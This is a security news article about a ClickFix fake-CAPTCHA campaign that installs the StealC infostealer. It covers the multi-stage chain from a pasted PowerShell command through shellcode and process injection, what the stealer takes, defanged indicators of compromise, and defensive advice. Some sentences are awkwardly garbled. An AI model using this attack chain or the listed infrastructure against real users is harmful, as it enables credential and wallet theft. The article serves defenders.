Security researchers are alerting people to a new malware campaign that uses a misleading verification technique called ClickFix to target Windows users This article explores step malicious script. . The StealC information stealer is covertly installed through a multi-stage infection chain and social engineering.

Sensitive financial and personal information is harvested by this popular cybercrime tool. The attack makes extensive use of fileless methods. The attackers execute code directly in memory rather than dropping blatant malware files. Because of this, it is challenging for conventional antivirus software to identify the activity.

How the Campaign Begins When a victim visits a genuine website that has been covertly compromised, the infection starts. A malicious script that loads a phony CAPTCHA page was injected into a restaurant website in the cases that were observed. The page mimics a security check from Cloudflare.

Four separate stages of payload delivery and execution are depicted in this multi-stage infection chain, which runs from the first PowerShell command to the StealC deployment (Source: levelblue). Victims are instructed to finish verification by: • Using Windows + R • Pasting a command that has already been copied to the clipboard • By hitting Enter, a hidden PowerShell command is launched. Without saving the loader script to disk, the command downloads it straight into memory by contacting a distant server.

The loader loads a 64-bit Windows downloader reflectsively by allocating memory and running position-independent shellcode. The final payload is retrieved by that downloader and injected into a trusted Windows process, like svchost.exe. The malware looks normal to the operating system because it operates inside a legitimate service. StealC is installed in the last step.

A malicious script is loaded by the compromised website (Source: levelblue). Inside Data Theft and the Multi-Stage Chain There are four steps in the infection chain: PowerShell → Shellcode → PE Downloader → StealC A framework that embeds a complete executable into memory was used to generate the shellcode. After that, the downloader deletes itself and executes process injection, leaving minimal forensic evidence behind.

StealC uses encrypted HTTP traffic encoded with Base64 and RC4 to communicate with its command server once it is operational. According to researchers, defenders can now identify the traffic with the aid of decryption tools and indicators of compromise (IOCs). StealC has a lot of power.

It pilfers: • Cookies, autofill information, and browser passwords • Seed phrases and cryptocurrency wallets • Accounts for Steam games • Outlook login information • Hardware fingerprint and system information • Desktop screenshots • Database files and documents The malware looks for more than 50 cryptocurrency wallet extensions in addition to browsers like Chrome, Edge, and Firefox. Additionally, it gathers email passwords stored in the registry and uploads them all in structured JSON format to its control server. To prevent network detection, large files are divided into smaller pieces.

JavaScript code that is malicious loads a ClickFix/CaPTCHA Fake (Source: levelblue) Interestingly, the malware doesn't stay on the computer. It can self-delete after data theft to lessen the amount of evidence.

IP 94.154.35.115 (payloads) IP 91.92.240.219 (PowerShell) IP 91.92.240.190 (C2) URL hxxp://94[.]154[.]35[.]115/user_profiles_photo/cptch[. ]bin URL hxxps://goveanrs[. ]org/jsrepo URL hxxps://madamelam[.

]com SHA-256 dc38f3f3c8d495da8c3b0aca8997498e9e4d19738e1e2a425af635d37d0e06b8 (cptchbuild.bin) Blue User-Agent Loader Level Researchers stress that human trust is the primary vulnerability that is taken advantage of. Commands recommended by a website verification page should never be executed by users. It is recommended that organizations keep an eye out for injected processes, outgoing encrypted HTTP traffic to unidentified servers, and unusual PowerShell activity.